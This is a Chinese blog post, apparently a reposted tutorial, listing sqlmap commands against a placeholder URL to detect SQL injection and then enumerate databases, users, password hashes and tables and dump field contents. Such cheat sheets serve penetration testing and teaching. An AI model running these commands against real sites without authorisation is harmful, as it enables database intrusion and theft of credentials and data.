SQLmap經(jīng)典用法(二)

基礎

1:檢測注入點是否可用?

? ? python sqlmap.py -u “http://www.target.com/example.asp?id=1”

1.1檢測結(jié)果

1.1.1注入type:

?? ?boolean-based blind

? ? error-based

? ? inline query

? ? stacked queries

? ? and/or time-based blind

? ? union query

1.1.2配置信息


? ? web服務器信息

? ? web應用程序技術

? ? 數(shù)據(jù)庫類型

1.2讓程序自動輸入若干詢問語句

??python sqlmap.py -u“http://www.target.com/example.asp?id=1”?--batch

2:爆庫

爆出其中所有數(shù)據(jù)庫的名字

? ? python sqlmap.py -u“http://www.target.com/example.asp?id=1”?--dbs


3:web當前使用的數(shù)據(jù)庫

?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—-current-db


4:列出數(shù)據(jù)庫所有用戶

?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—-users


5:web數(shù)據(jù)庫使用賬戶

?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—-current-user


6:數(shù)據(jù)庫賬戶和密碼

?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?--passwords


7:列出數(shù)據(jù)庫中的表

?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—D 數(shù)據(jù)庫名字 —-tables


8:列出表中的字段

?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—D 數(shù)據(jù)庫名字 -T 表的名字—-columns


9:爆字段內(nèi)容

?? ?python sqlmap.py -u“http://www.target.com/example.asp?id=1”?—D 數(shù)據(jù)庫名字 -T 表的名字?—C 要爆的字段 (—-start 1?—-stop 10 ?)—-dump/制定開始的行和結(jié)束的行/將結(jié)果導出


http://www.cnblogs.com/studyone/p/5426303.html

?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內(nèi)容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當給sq...
    xuningbo閱讀 10,562評論 2 22
  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,207評論 0 5
  • sqlmap也是滲透中常用的一個注入工具,其實在注入工具方面,一個sqlmap就足夠用了,只要你用的熟,秒殺各種工...
    查無此人asdasd閱讀 1,618評論 0 1
  • sqlmap也是滲透中常用的一個注入工具,其實在注入工具方面,一個sqlmap就足夠用了,只要你用的熟,秒殺各種工...
    linkally閱讀 7,202評論 1 40
  • SQLMAP作用 判斷可注入的參數(shù) 判斷可以用哪種SQL注入技術來注入 識別出哪種數(shù)據(jù)庫 根據(jù)用戶選擇,讀取哪些數(shù)...
    陸灑脫閱讀 3,810評論 1 4

友情鏈接更多精彩內(nèi)容